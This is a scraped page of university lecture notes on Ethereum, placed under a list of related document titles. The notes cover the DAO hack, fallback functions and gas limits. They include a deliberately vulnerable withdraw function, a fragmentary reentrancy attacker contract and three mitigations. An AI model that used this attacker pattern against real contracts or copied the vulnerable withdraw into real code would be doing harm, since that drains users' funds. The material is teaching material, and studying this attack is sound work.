Lecture 10. A2 - will post tonight - due in two weeks

Similar documents
Page Total

Smart Contract Security Tips. Ethereum devcon2 Sep Joseph Chow

CS 251: Bitcoin and Crypto Currencies Fall 2015

CS 251: Bitcoin and Cryptocurrencies Fall 2016

Introduction to Blockchain

The power of Blockchain: Smart Contracts. Foteini Baldimtsi

Ethereum. Smart Contracts Programming Model

ENEE 457: E-Cash and Bitcoin

Bitcoin, Security for Cloud & Big Data

An Analysis of Atomic Swaps on and between Ethereum Blockchains Research Project I

Lecture 44 Blockchain Security I (Overview)

The promise and peril of smart contracts

POA Bridge. Security Assessment. Cris Neckar SECUREWARE.IO

COEN 241 Term Project. A Blockchain-based Cloud Service

Privacy-Enabled NFTs: User-Mintable, Non-Fungible Tokens With Private Off-Chain Data

Securify: Practical Security Analysis of Smart Contracts

FXY TOKEN SMART CONTRACT AUDIT RESULTS FOR FIXY NETWORK LTD

A living programming environment for a living blockchain

The Technology behind Smart Contracts

Computer Security. 14. Blockchain & Bitcoin. Paul Krzyzanowski. Rutgers University. Spring 2019

LECTURE 2 BLOCKCHAIN TECHNOLOGY EVOLUTION

Smart Contract Vulnerabilities The most interesting transactions on the Ethereum network

Smart!= Secure - Breaking Ethereum Smart Contracts. Elliot Ward & Jake Humphries

OpenbankIT: a banking platform for e- money management based on blockchain technology

Blockchain for Enterprise: A Security & Privacy Perspective through Hyperledger/fabric

Secure Token Development and Deployment. Dmitry Khovratovich and Mikhail Vladimirov, University of Luxembourg and ABDK Consulting

BITCOIN PROTOCOL & CONSENSUS: A HIGH LEVEL OVERVIEW

BaFin-Tech 2018 BlockChain & Security (from #developerview)

Set: Hub-and-Spoke Cryptographic Payment Channels

ZILLIQA / ZILIKƏ/ NEXT GEN HIGH-THROUGHPUT BLOCKCHAIN PLATFORM DONG XINSHU, CEO JIA YAOQI, BLOCKCHAIN ZILLIQA.

Unblockable Chains. Is Blockchain the ultimate malicious infrastructure? Omer Zohar

Smalltalk 3/30/15. The Mathematics of Bitcoin Brian Heinold

ContractFuzzer: Fuzzing Smart Contracts for Vulnerability Detection *#

BLOCKCHAIN CADEC Pär Wenåker & Peter Larsson

Implementing and Mechanically Verifying Smart Contracts

Key concepts of blockchain

Callisto Network Whitepaper

How Bitcoin achieves Decentralization. How Bitcoin achieves Decentralization

Abstraction: Distributed Ledger

Consensus & Blockchain

Multiparty Computation (MPC) protocols

What is Bitcoin? Consensus technology has the power to do for economics what the internet did for information - Dan Larimer

TABLE OF CONTENTS 1.0 TOKEN SALE SUMMARY INTRODUCTION HOW TO BUY LION HOW TO BUY LION WITH METAMASK

Wormhole: A Smart Contract Solution for Bitcoin Cash

Who wants to be a millionaire? A class in creating your own cryptocurrency

Active Planning Committee John Lindsay, Patent Attorney Tony Schuman, Investment Advisor Todd Russell, Gov t Contract Opportunities

Ethereum Computation Market Documentation

Brown University. Yana Hrytsenko. Final Project: Blockchain for PKI: Using Blockchain data structure for Public Key. Infrastructure.

Ethereum Consortium Network Deployments Made Easy Christine Avanessians Senior Program Manager

Bitcoin and Blockchain

Gnosis Safe Documentation. Gnosis

Erays: Reverse Engineering Ethereum s Opaque Smart Contracts

Using Chains for what They re Good For

Ergo platform overview

Ethereum Consortium Blockchain in Azure Marketplace Christine Avanessians Senior Program Manager

Zero-Knowledge proof of knowledge transfer. Perm summer school on blockchain 2018

Blockchain, Cryptocurrency, Smart Contracts and Initial Coin Offerings: A Technical Perspective

ICO Review: Raiden Network (RDN)

Table of contents. Abstract. Disclaimer. Scope. Procedure. AS-IS overview. Audit overview. Conclusion. Appendix A. Automated tools reports 12

Technical Analysis of Established Blockchain Systems

QIIBEE Security Audit

Pillar Token Code Review

Learn Blockchain Programming. Ali Dorri

Bitcoin, a decentralized and trustless protocol

Software Security. Final Exam Preparation. Be aware, there is no guarantee for the correctness of the answers!

REM: Resource Efficient Mining for Blockchains

Blockchains & Cryptocurrencies

Verifiable Computation in Smart Contracts

Radix - Public Node Incentives

Ethereum. Campbell R. Harvey* Duke University and NBER. Ashwin Ramachandran Duke University. Brent Xu ConsenSys. Innovation and Cryptoventures

SMARTDATA: Leveraging Blockchain to Securely Capture & Verify Scientific Provenance Data

Problem: Equivocation!

Interledger. Internetworking for Money. Evan Schwartz Engineer at Ripple Co-Inventor of Interledger

DIGITAL ASSET RESEARCH

ICS 421 & ICS 690. Bitcoin & Blockchain. Assoc. Prof. Lipyeow Lim Information & Computer Sciences Department University of Hawai`i at Mānoa

Chapter 13. Digital Cash. Information Security/System Security p. 570/626

What s new under the blockchain sun. HYPERLEDGER FABRIC AND A SHORT SURVEY OF INTERLEDGER. DIDIER PH MARTIN, PHD.

A SYSTEM FOR ENABLING SHORT-TERM FINANCING

CS 4770: Cryptography. CS 6750: Cryptography and Communication Security. Alina Oprea Associate Professor, CCIS Northeastern University

Security: Focus of Control

ICO Review: Etherparty (FUEL)

Public Chain for Digital Asset Escrow

Defining the Ethereum Virtual Machine for Interactive Theorem Provers

Multiparty State Channels Enabling Real-Time Poker on Ethereum

Ergo platform. Dmitry Meshkov

Cryptography and Network Security

Lecture 3. Introduction to Cryptocurrencies

Replay Attacks on Ethereum Smart Contracts. Zhenxuan Bai, Yuwei Zheng, Kunzhe Chai Senhua Wang

The security and insecurity of blockchains and smart contracts

Previous Name: D3. Fourth Estate. A secure, decentralized news data storing and sharing solution for journalists

Chapter 9: Key Management

Declarative Static Analysis of Smart Contracts

cchannel Generalized State Channel Specification

kasko2go Token Contract Audit

A Java Framework for Smart Contracts

scompile: Critical Path Identification and Analysis for Smart Contracts

Ergo platform: from prototypes to a survivable cryptocurrency

EECS 498 Introduction to Distributed Systems

BLOCKCHAIN Blockchains and Transactions Part II A Deeper Dive

DTX Token. Starter guide

Transcription:

Lecture 10 A2 - will post tonight - due in two weeks The DAO - $72M USD in Ether Decentralized Dragon's Den or Shark's Tank A pot of money that you could contribute to and receive voting shares for You vote on funding projects The attack happened but the stolen funds sat quarantined for 30 days This means the stolen funds were not circulated and so a roll back was possible Ethereum project put in a special block that destructed the DAO contract and refunded everyone's money but the block is invalid --- so need consensus of the network to make an exception and accept it Most went with undoing the DAO attack and this chain is called Ethereum Some objected and did not undo the attack --- their chain is called Ethereum Classic Today ETC trades at about 10% the value of Ether The bug: reentrance / recursive calls Back to Ethereum External accounts - works like Bitcoin Contract accounts - running smart contracts; work by your design Alice and Bob want to use Ethereum like Bitcoin Use external accounts Alice pays Bob How does Bob know he was paid? Consulting the blockchain Automated by his client He sits down at a new paper, parse the whole blockchain to figure out transaction history Use a contract as a wallet with more features Can log all transactions in the state Can notify the use of transactions Can use multi-signatures or fancy access structures Ethereum client has one built in called a wallet and it is exposed in the UI

Alice pays Bob Alice pays to Bob's wallet smart contract Bob's wallet only runs if someone calls a function on it No code runs by itself on Ethereum IDEA! What if when you transfer money to a smart contract, that contract is allowed to run some code at that point? Issue 1: Which function in the smart contract will run when it receives money? Convention that it will run a special function with a special name What was the name? No name (empty string) function() payable { Fallback function Payable enables it to receive money when called Fallback function is also called if the function that is called cannot be found Issue 2: Gas Who pays for the fallback function to run? Recall the fallback in Contract B is being triggered by Contract A sending money to the address of Contract B (for whatever reason). Someone is paying for Contract A to run this function; why should they pay for Contract B as well? Paying contract pays the gas but can set a gas limit when it transfers the money If it runs out of gas (or fails for other reasons), an exception is thrown and/or the transfer function returns a boolean of false address.send(10) -> send 10 wei to address -> if error, it will return false, fallback function that is invoked is limited to 2300 gas address.transfer(10) -> same as send but throws an exception instead, fallback function that is invoked is limited to 2300 gas address.call.value(10)() -> old school way of sending money, returns false, uses whatever gas is available from the calling function address.send(10) = address.call.gas(0).value(10)() address.transfer.gas(120000)(10) -> run transfer with more gas Issue 3: code flow control When you transfer money to an address and the address is a contract,

you are turning control over to someone else's code that might be malicious and can do whatever it wants (within the gas you give it) // http://www.blunderingcode.com/writing-secure-solidity/ contract Victim { mapping (address => uint) userbalances; if (msg.sender.call.value(userbalances[msg.sender])()) { function() payable { userbalances[msg.sender] += msg.value; Contract contains a list of users and their "balances" in ledger as the data structure, and it also contains Ether (attached to the address) For example, contract might hold 10 Ether and have: A_address 5 B_address 3 C_address 2 D_address 0 Alice calls withdraw. She does it from an account. msg.sender will be her account Withdraw finds the balance of her account (5), as stored in userbalances, and transfers her that amount of money (5). **** If it succeeds, her balance is made to be 0. If it does not, the balance does not update. During **** Alice gets to run her fallback function

if (msg.sender.call.value(userbalances[msg.sender])()) { Alice's fallback function: What if Alice in her fallback function calls withdraw again? if (msg.sender.call.value(userbalances[msg.sender])()) // if (alice.call.value(5)())... // if (alice.call.value(5)() -> Alice's fallback) // if ( Alice's fallback ) // if ( withdraw ) // if ( if (alice.call.value(5)()) ) // if ( if ( if ( if ())))

Example of fallback function contract Attacker { Victim v; function Attacker(address dest) { v = Victim(dest); function attack() { v.call.value(msg.value)(); v.withdraw(); function() payable { if (msg.gas > 100000) { v.withdraw(); Mitigations: 3 approaches (not mutually exclusive) 1) Don't use call to send money, use transfer or send --> fallback function still runs but it is limited in terms of Gas to 2300 (which is thought to not be enough to do anything malicious) 2) Do the logic that updates the state before (not after) calling the transfer function uint balance = userbalances[msg.sender]; if (msg.sender.call.value(balance)()) { else{ userbalances[msg.sender] = balance;

3) Control flow integrity -> lock down who can enter a function and from where Locks -> States State Machine where before withdraw is called, the state is "open" and the first of line of withdraw will check that the state is open; the second changes the state to closed; then you add your code enum States {Open, Closed; States state; require state=states.open; state=states.closed; if (msg.sender.call.value(userbalances[msg.sender])()) { state=states.open;

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback